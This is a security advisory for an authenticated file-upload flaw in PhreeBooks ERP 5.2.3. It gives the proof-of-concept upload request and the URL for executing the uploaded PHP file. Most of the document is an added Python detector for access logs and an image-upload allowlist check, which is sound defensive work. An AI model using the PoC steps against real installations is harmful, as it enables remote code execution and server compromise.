# PhreeBooks ERP 5.2.3 Arbitrary File Upload Vulnerability
==EXP==
# Exploit Title: PhreeBooks ERP v5.2.3 - Arbitrary File Upload
# Date: 03.04.2019
# Exploit Author: Abdullah Çelebi
# Vendor Homepage: https://www.phreesoft.com/
# Software Link: https://sourceforge.net/projects/phreebooks/files/latest/download
# Category: Webapps
# Version: 5.2.3
# Tested on: WAMPP @Win
# Software description:
PhreeBooks 5 is a completely new web based application that utilizes the
redesigned Bizuno ERP library from PhreeSoft. Bizuno supports PHP 7 along
with all the latest versions of mySQL. Additionally, Bizuno utilizes the
jQuery EasyUI graphical interface and will be also enhanced for mobile
devices and tablets.
# Vulnerabilities:
# An authenticated user can achieve remote code execution by uploading a
# PHP file through the imgFile parameter of the Image Manager.
# Code Section @Tools>Image Manager
# POC - RCE via Arbitrary File Upload:
Request used to upload the malicious file:
http://localhost/PhreeBooksERP/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload
POST body:
imgSearch=&imgFile=evilcode_key.php
Result (the uploaded file is then reachable through the file-serving endpoint):
http://localhost/PhreeBooksERP/bizunoFS.php?&src=0/images/evilcode_key.php
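The following Python script is an added defender-side example and is not part of the advisory or of PhreeBooks itself. It shows two things a practitioner would want from this finding: a log check that flags script files being requested through `bizunoFS.php` (and correlates them with an earlier Image Manager upload from the same client), and the server-side allowlist check an image upload handler should apply, which combines an extension allowlist with a magic-byte check so a PHP file renamed to look like an image is rejected. It assumes Apache/nginx "combined" access-log format, and the sample log lines are constructed for illustration.

```python
"""Detect and prevent script uploads through an image manager.

Added example, not code from the PhreeBooks project. Assumes Apache/nginx
combined access-log format; request paths follow the advisory's PoC URLs.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined log line: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Extensions the PHP engine or Apache handlers may execute. An image
# manager should never store or serve a file with one of these.
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}

# Route and file-serving endpoint named in the advisory.
IMAGE_MANAGER = "bizuno/image/manager"
FILE_SERVER = "bizunoFS.php"

# Constructed sample traffic (not real log data). Client 10.0.0.5 performs
# an Image Manager upload and then fetches a .php file through bizunoFS.php;
# client 10.0.0.9 fetches an ordinary image.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Apr/2019:10:01:12 +0000] "GET /PhreeBooksERP/index.php?&p=bizuno/image/manager&imgAction=upload HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2019:10:01:15 +0000] "POST /PhreeBooksERP/index.php?&p=bizuno/image/manager&imgTarget=&imgMgrPath=&imgSearch=&imgAction=upload HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.5 - - [03/Apr/2019:10:01:20 +0000] "GET /PhreeBooksERP/bizunoFS.php?&src=0/images/evilcode_key.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
10.0.0.9 - - [03/Apr/2019:10:05:02 +0000] "GET /PhreeBooksERP/bizunoFS.php?&src=0/images/logo.png HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line into the fields the detector needs."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    url = urlsplit(m["target"])
    # The PoC query strings start with "&"; parse_qs skips the empty pair.
    qs = parse_qs(url.query, keep_blank_values=True)
    return {
        "ip": m["ip"], "method": m["method"], "path": url.path,
        "status": int(m["status"]),
        "p": qs.get("p", [""])[0],
        "imgAction": qs.get("imgAction", [""])[0],
        "src": qs.get("src", [""])[0],
    }


def has_script_extension(name):
    name = name.lower()
    return any(name.endswith(ext) for ext in SCRIPT_EXTS)


def find_alerts(log_text):
    """Flag script files served via bizunoFS.php; note prior uploads by the same IP."""
    alerts = []
    uploaders = set()  # clients that POSTed to the Image Manager upload action
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if (ev["method"] == "POST" and ev["p"] == IMAGE_MANAGER
                and ev["imgAction"] == "upload"):
            uploaders.add(ev["ip"])
        elif ev["path"].endswith(FILE_SERVER) and has_script_extension(ev["src"]):
            alerts.append({"ip": ev["ip"], "src": ev["src"],
                           "after_upload": ev["ip"] in uploaders})
    return alerts


# Server-side check for the upload handler: extension allowlist plus the
# file's leading bytes must agree, so content type is not trusted blindly.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def is_acceptable_image(filename, head):
    """True only if the extension is allowlisted and the leading bytes match it."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return False
    # Reject double extensions such as shell.php.png as well.
    if any("." + p in SCRIPT_EXTS for p in parts[1:-1]):
        return False
    magic = IMAGE_MAGIC.get("." + parts[-1])
    return magic is not None and head.startswith(magic)


if __name__ == "__main__":
    for a in find_alerts(SAMPLE_LOG):
        print(a)
```

Because the POST body is not written to access logs, the uploaded filename itself is not visible there; the detectable signal is the later request for a script file through the file-serving endpoint, which is why `find_alerts` keys on that and only uses the upload request as corroboration.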